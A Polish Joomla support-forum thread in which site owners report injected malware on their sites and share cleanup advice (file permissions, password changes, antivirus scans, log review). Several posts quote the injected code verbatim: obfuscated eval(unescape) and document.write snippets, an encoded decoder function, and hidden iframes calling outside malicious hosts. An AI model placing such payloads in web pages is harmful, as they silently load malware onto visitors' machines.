Od kilku dni mam problemy na swojej stronie. Sprawa wyglÄ…da tak:

Najpierw dostałem monity, że ładują się trojany na stronie...
Sprawdziłem kod.. w index.php znalazłem

<script language="JavaScript">e = '0x00' + '54';str1 = "%EF%B7%BC%A1%CB............itd

Usunąłem, zainstalowałem najnowszą joomle, zupdatowałem komponenty...
Dzisiaj znalazłem znowu ten kod, ale tym razem w templatkach, byl tam w index.php...

Czy ktos może to odkodować?
Jak zablokować możliwość edytowania index.php w templatkach?
Ewentualnie jak sie przed tym bronić...

TUTAJ (http://support.handsonwebhosting.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=102) znajdziesz opis problemu i skrypty które można wkleić aby się przed tym uchronić

Jak narazie udało mi się rozwiązać problem bez takich drastycznych środków :)
Jak sprawa się potoczy dalej nie wiem... aktualnie wszystko wróciło do normy.

:mad:Mam ten sam problem,najpierw coś mi podmieniało plik index.php, teraz robi się dodatkowo wpis na końcu tego pliku <script type="text/javascript">document.write('\u003c\u0069\..........</script> , <script>eval(unescape("%77%..................")); </script>. Zaktualizowalem joomle do wersji joomla_1.0.13_JIE-pl-utf dalo to efekt ale tylko jednodniowy.Pytanie od czego sie to mogło stać,jak sie przed tym ustrzec?
gdzie dokladnie mam wstawić ten wpis??
moja strona to www.conttato.com.pl

nibas (http://forum.joomla.pl/member.php?u=6322) to może byś się podzielił tym jak Ci się udało rozwiązać ten problem, a nie tylko chwalisz się, że sprawa rozwiązana i jest fajnie. Chciałeś pomocy na forum, to może też pomóż innym wzamian

2 najlepsze rady to:

1. link podany przez marco to nie jest takie trudne
2. ograniczenia zalozyc na pliki - zmienic chmoda na 444 dla pliku index (lub innych w ktorych nie chcecie grzebac) wtedy wszyscy beda mogli tylko czytac plika a nie zapisywac na nim nic

... osobiscie stosuje oba rozwiazania w zaleznosci od potrzeb

1. link podany przez marco to nie jest takie trudne


Oczywiście, ale wyłącznie dla znających język angielski.

Korzystając z translatora on-line otrzymałem tłumaczenie całkowicie niezrozumiałe i bez sensu. Jeśli ktoś znalazłby chwile czasu aby zamieścić tutaj sensowne tłumaczenie, to zapewne wiele osób wyraziłoby swoją wdzięczność.

Najprosciej jak sie da:

W index.php wrzucasz w czesci "head" kod


<script type="text/javascript">
function disableDocWrite () {
document.oldDocumentWrite = document.write;
document.write = function () {};
}
function enableDocWrite () {
document.write = document.oldDocumentWrite;
}
disableDocWrite();
</script>

To co oni tam wypisuja to jaki maja problem oraz co zrobic aby nadpisywac tymczasowo za pomoca js itp - niepotrzebne standardowemu uzytkownikowi (czytaj. tobie rowniez)

Wielkie dzięki za zrozumienie problemu i szybkość reakcji.

Nic z tego wpisuje ten skrypt podany przez marco do plików index.php ,idex.html. Może źle to jakoś robię. We wszystkich plikach index.* wrzuca mi sie nadal złośliwy wpis:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75
%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%7 4%
2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e %
61%6d%65%3d%62%64%35%20%73%72%63%3d%5c%27%68%74%74 %
70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c %6
f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75% 6e
%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%3 9
%34%38%33%31%29%2b%27%35%5c%27%20%77%69%64%74%68%
......")); </script>
Plus dodatkowo:
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065
\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u 0074\u0070\u003a
\u002f\u002f\u0074\u0072\u0066\u0066\u0063\u002e\u 006f\u0072\u0067...')</script>

Witam!
Powyższe rozwiązanie mi nie pomogło,może coś źle robię!
W pliku index2.php i index3.php w katalogu administrator znalazłem taki wpis:


<script language=JavaScript>function abban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,29, 6,1,31
21,22,50,42,47,0,0,0,0,0,0,24,32,34,57,58,35,43,51 ,41,2,28,4,44
,13,56,54,26,8,27,62,33,52,53,19,59,38,5,0,0,0,0,3 7,0,15,30,16,36,23,60,
49,45,48,9,10,39,7,61,17,18,40,14,11,12,20,0,46,
55,25,3);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|
=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(175^w&255);w
>>=8;s-=2}else{s=6}}document.write(r)}}abban('WPJ71XLik0Q x1GLdm9nO4e
jAvDjx4RtGkmqg3ltivwMAaBhgs9ngpDCEmFLgQ4fOpDCEJ9hV zFLdyRtx2xLgzR
fO6eCg29f7kmJdWIqgjxhGIFJd')</script> :mad:
pomocy!!

Odgrzebuje troche stary temat ale chce sie podzielic swoim rozwiazaniem. Moim zdaniem jest skuteczne - strona ktora tak uratowalem dziala juz ponad miesiac. I raczej ten problem nie jest to blad Joomli tylko najczesciej "podsluchane" haslo do waszego serwera FTP przez jakiegos szkodnika na waszym komputerze lub "zlosliwa" strone www.

Rozwiazanie jest proste.
Najpierw sprawdzamy czy na swoim komputerze nie mamy zadnych wirusow. Potem logujemy sie do konta zmieniamy ustawienia hasla. Sprawdzamy wszystkie pliki index.php index.html default.html i ich warianty czy na ich koncu nie ma wpisow zaczynajacych sie od <iframe lub <script> - jesli tak to usuwamy. Generalnie do sprawdzenia sa wszystkie pliki w katalogu glownym i podkatalogach (zmienione maja najczesciej ta sama date modyfikacji) ale juz nie w podpodkatalogach. Potem jak juz sprawdzilismy wszystkie pliki zmieniamy chmody plikow na 644 i katalogw na 755 oczywiscie poza tymi ktore musza miec wieksze prawa. A na koniec po raz drugi zmieniamy hasla do Joomli oraz do konta ftp na ktorym jest nasza Joomla.
To powinno pomoc.
Inkos

Inkos w moim przypadku jest podobnie ale u mnie jakies 20 domen juz tak dziala ponad rok wiec twoje myslenie jest pewnie jak najbardziej sluszne.

<!-- o --> <script type="text/javascript">
<!-- document.write(unescape('%3C%69%66%72%61%6D%65%20% 73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%6C%65%76 %69%73%69%74%6F%72%2E%6E%65%74%2F%69%6E%2E%63%67%6 9%3F%32%22%20%77%69%64%74%68%3D%31%30%30%20%68%65% 69%67%68%74%3D%31%30%30%20%73%74%79%6C%65%3D%22%76 %69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6 E%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E')) //-->
</script>
<!-- c -->

To fragment mojego kodu, jaki mi doklejno we wszystkich plikach index.php i index.html. Rozwiązaniem było usunięcie tego fragmentu ze wszystkich plików a konkretnie nadpisanie tych podmienionych orginałami z twardego dysku.
- wysztkie zmodyfikowano o tej samej porze (a dokładnie w odstępie 3 minut, zmiany zostały wykonane o godzinie 17:32:00, 17:33:00 i 17:34:00)
Aby "przetłumaczyć" kod heksadecymalny wystarczy wejść na stronkę http://poczta.pnet.pl/~zajaczek/trivia/unescape.htm gdzie możecie rozkodować kod szesnastkowy. W moim przypadku byla to ramka ze skryptem cgi przekirowującym na stronę Altavista.


Dodatkowo znalazłem jeszcze ten kod w pliku:
/administrator/includes/auth.php
/administrator/templates/joomla_admin/login.php
/components/com_login/login.php
/templates/nazwa_szablonu/css/template_css.css
oraz index.php i login.php w Coopermine.

To fragment mojego kodu, jaki mi doklejno we wszystkich plikach index.php i index.html. Rozwiązaniem było usunięcie tego fragmentu ze wszystkich plików a konkretnie nadpisanie tych podmienionych orginałami z twardego dysku.
Jaką masz wersję Joomla? Jeśli którąś ze starszych to ją zaktualizuj i zastosuj się do rad z mojego postu umieszczonego powyżej w tym wątku.

Jeśli to Joomla z rodziny 1.0.x to wskazana bedzie wkrótce aktualizacja do wersji 1.0.14 która pojawi się niebawem. Do tego czasu zalecam trochę ostrożności i skorzystanie z tej rady: Jeśli jesteś zalogowany do zaplecza swojej witryny to nie otwieraj w przeglądarce innych stron tylko co najwyżej swoją i zaplecze. Po pracy wyczyść cache i dopiero przeglądaj inne witryny. Wiem że to brzmi dziwnie ale po lekturze postów z forum.joomla.org okaże się prawdziwe.

Ja chciałem zypytac atakowanych, czy w instalacjach, ktore zostaly zainfekowane obcym kodem odpalone lub zainstalowane sa dodatki:
joomlaboard, forumboard lub jakies inne forum z tej rodziny (nie pamietam poprostu jakie to bylo).

wersja Joomli to 1.0.13 UTF-8 Ale z tym otwieraniem tylko strony i zaplecza admina t moe by problem :) z reguÅ‚y mam otwartych po kilka zakÅ‚adek :) A wiadomo już kiedy można siÄ™Â*spodziewać stabilnej 1.0.14?

Mard, z dodatków, ktore wymieniasz nie mam nic, mam tylko Coopermine i coÅ› mi siÂ*Ä™Â*wydaje, że tu tkwi problem. Od jakiegoÅ› czasu dostajÄ™ mnóstwo mail o rejestracji w galerii.

a czy ktos przegladal logi serwera, zeby ustalic co spowodowalo includowanie wlasnego kodu i poskudkowalo podmianom pliku ?? moze w ten sposob dojdziemy co powoduje ten klopot. Ja tym sposobem znalazlem wlasnie kiedy dziure w forum.

Ja chciałem zypytac atakowanych, czy w instalacjach, ktore zostaly zainfekowane obcym kodem odpalone lub zainstalowane sa dodatki.
U jednego z moich "klientów" była czysta Joomla beż żadnych dodatków ale i tak padła ofiarą. Po analizie logów i lokalnego komputera okazało się że winowajcą był Trojan który "podsłuchał" hasła. Logi servka były czyste. Po prostu "ktoś/coś" zalogowało się o konkretnej godzinie do konta FTP z IP pochodzącego z Rosji i dokonało zmian. Takie "wizyty" były dość "popularne" pod koniec ubiegłego roku i zostały omówione na forum.joomla.org w "Security".

aha. czyli tak naprawde sam powod problemu nie byl w joomli tylko w wirusie ladowanym dzieki joomli ?? tak to rozumiem ??

aha. czyli tak naprawde sam powod problemu nie byl w joomli tylko w wirusie ladowanym dzieki joomli ?? tak to rozumiem ??
W tym przypadku po dokładnej analizie logów wyszło że to nie Joomla była winowajcą ale zainfekowany trojanem lokalny komputer z którego administrowano stroną. Zresztą te infekcje to problem nie tylko dotyczący Joomlowych stron. Sam już znalazłem wiele stron opartych na różnej maści CMS-ach ale i także stronach statycznych które na końcu kodu miały właśnie taki oto "prezent" dla odwiedzających. Najczęsciej tak jak w tym przypadku są to właśnie przedstawiciele ciekawej rodzinki trojanów Agent i podobnych.

Od tego czasu po lekturze forum.joomla.org i wprowadzeniu wszystkich tych zasad jakie opisałem powyżej jest spokój. Choć w logach jeszcze przez jakiś czas były odnotowane próby wejścia z tych IP z których nastąpił atak.

czyli co tu debatowac odpowiedni antywirus oraz firewall generalnie zabezpiecza przed probleme, a naprawa...coz trzeba by chyba dokladnie przegladnac pliki, pousuwac "zly" kod i oczywiscie pozmieniac hasla.)

nawiasem mowiac chyba o problemie nie slyszalem zbyt wiele, gdyz jakos szczesliwie wirusy mnie omijaja :P

nawiasem mowiac chyba o problemie nie slyszalem zbyt wiele, gdyz jakos szczesliwie wirusy mnie omijaja :P
Przezorny zawsze zabezpieczony. :) Czysty własny komp to większa szansa na czystą witrynę na serwerze. No i pewniejszy święty spokój. :D

A co do naprawy to akurat te "wizyty" ograniczają się tylko do dodania kodu lub podmiany plików na serwerze FTP. Stąd jeśli jest backup to nie ma problemu a jeśli go nie ma to najczęściej te pliki można podmienić z paczki. O ile w wersji na servku nie było autorskich zmian. ;)

Jeden z antyvirów, na których pracowałem wykrył Trojan.Clicker.HTML.IFrame.is I blokował w ogóle odstęp do strony. Jak zmieniłem usunąłęm ten kod tylko w index.php strona chodziła bezbłędnie, ale nie moglem zalogować się do panelu admina.
Jak naprawiaÅ‚em (podmieniaÅ‚em) pliki zauważyÅ‚em,Â*że nie ruszono wogóle dodanych komponentow, botów i modułów dodanych. Tylko orginalne z paczki Joomli. I Coopemine - myÅ›lÄ™, że tu byÅ‚a przyczyna. WedÅ‚ug mnie to byÅ‚o coÅ› w stylu XSS (http://pl.wikipedia.org/wiki/Cross-site_scripting) DośćÂ*obszerny artykuÅ‚ na ten temat TUTAJ (http://www.gajdaw.pl/varia/xss-cross-site-scripting/)

Witam.

Na początku sorry, za odświeżenie tamatu, ale nie am sensu zakładać nowego a ciąg dalszy nastąpił. Raczej chyba nie "wyleczyłem" Joomli chyba do końca :(. Otwarłem ostatnio swoją stronke pod IE7 i od razu problemy pokazały sie problemy. Ale po kolei. Przeszukałem wszystkie pliki, ściągnąłem z serwera, przeskanowałem antyvirem, podmieniłem na orginały na serwerze i dalej to samo. Nie mogę znaleźć pliku odpowiadającego za wyświetlanie strony głównej - a w zasadzie fragmentu widocnego na screenie:
http://img218.imageshack.us/img218/2040/screen1pv5.jpg (http://imageshack.us)

Jak można zauważyć - tylko w Operze - nad tytułem pierwszego newsa są wstawione kilka razy znaczniki <iframe> nad pozostałymi "tylko" raz. Usiłuję znaleźć plik, który za to odpowiada, bo tam zapewne jest wrzucony kod:

<iframe src="http:.................." width=1 height=1></iframe> z adresem zapisanym w ASCII przekierowujący do: http://cdpuvbhfzz.com/dl/adv598.php. Pod IE7 włącza się jakaś podejrzana aktualizacja Javy.

Proszę o pomoc, już nie wiem gdzie mam szukać. Z bazy pousuwałem zbędne tabele, wydaje się, że jest czysta.

Z góry dzieki.
Mirrr
Joomla!1.0.13 zaktualizowana w ostatnich dniach do 1.0.15.

Ogólnie co do coppermine i joomla oraz iframe walczyłem z tym na dwóch serwerach i jakby ktoś szukał w forum znalazłem rozwiązanie dla siebie moze pomoże...

http://www.forum.joomla.pl/showthread.php?p=70362#post70362
http://www.forum.joomla.pl/showthread.php?t=17491

trzeba aktualizować coppermine.... konkretniej plik upload.php jest juz wersja copera 1.1.18 (chyba).... i backup serwera... bo iframe zagnieżdża się w każdym pliku php i html....

Coopermine już wywaliłem całkiem, zostawiłem tylko folder albums i fotki w środku. Tak jak pisałem wszystko ściągnąłem i przeskanowałem antyvirem - wyłapał 3 zainfekowane pliki. Oczywiście podmieniłem je na orginały. Podmieniłem też wszystkie pliki .php i .html na orginały. Bez efektu. Ogólnie dział bezpieczeństwa prześwietliłem ostatnio bardzo dokładnie - stąd m. in wywalenie Coopermine :) Może ktoś wie, który plik odpowiada za układ i wyświetlanie elementów na stronie głównej - domyślam się, że tam powinnien być problem. index.php w szablonie jest czysty.

Pocieszę cię - musisz przeglądnąć wszystkie pliki index.php index2.php index.html default.php itp w glownych podkatalogach czyli:
administrator\
components\
etc.
Jak masz szczescie to nie bedziesz musial isc o jeszcze jeden poziom nizej.
Jak je wszystkie posprzatasz to powinno byc juz spokoj. :)

no chyba ze masz na serwerze inne katalogi :D u mnie było do naprawienia blisko pół miliona plików... no ale co... płacą extra to sie robi :D

no chyba ze masz na serwerze inne katalogi :D u mnie było do naprawienia blisko pół miliona plików... no ale co... płacą extra to sie robi :D
Prosciej bylo Joomle przeinstalowac i podpiac stara baze niz sie tak meczyc. Ale przy okazji poznales dokladnie strukture plikow Joomla. :D A tych plikow nie ma az tak duzo - bez przesady jest ich ow wiele mniej niz z pol miliona. :)

część plików była od joomli ale mnóstwo było poprawianych ręcznie... backup był z dnia wcześniej a akturat trafiło jak mieliśmy renowacji trochę tego dnia... no i sprawdzaliśmy prawie każdy plik czy nie zawiera <iframe> na końcu bo juz nie mogliśmy połapać sie które są nadpisane które nie, i które nie mają zmian...
co do ilosci plików to nie szło o jedną joomle :) ale ni tylko o joomle o phpbb coppera i inne wynalazki do stron www :) chwała bogu ze bazy ocalały :D

aaa... przy okazji... po tem wszystkim w każdej Joomli w wyświgu ;) jak chce dodać fotkę , to pokazuje mi w oknie ze jest zdjęcie jak dam insert nic sie nie dzieje pokazuje pasek stanu załadowany i nie dodaje obrazka do treści.. nie wiesz co to moze być?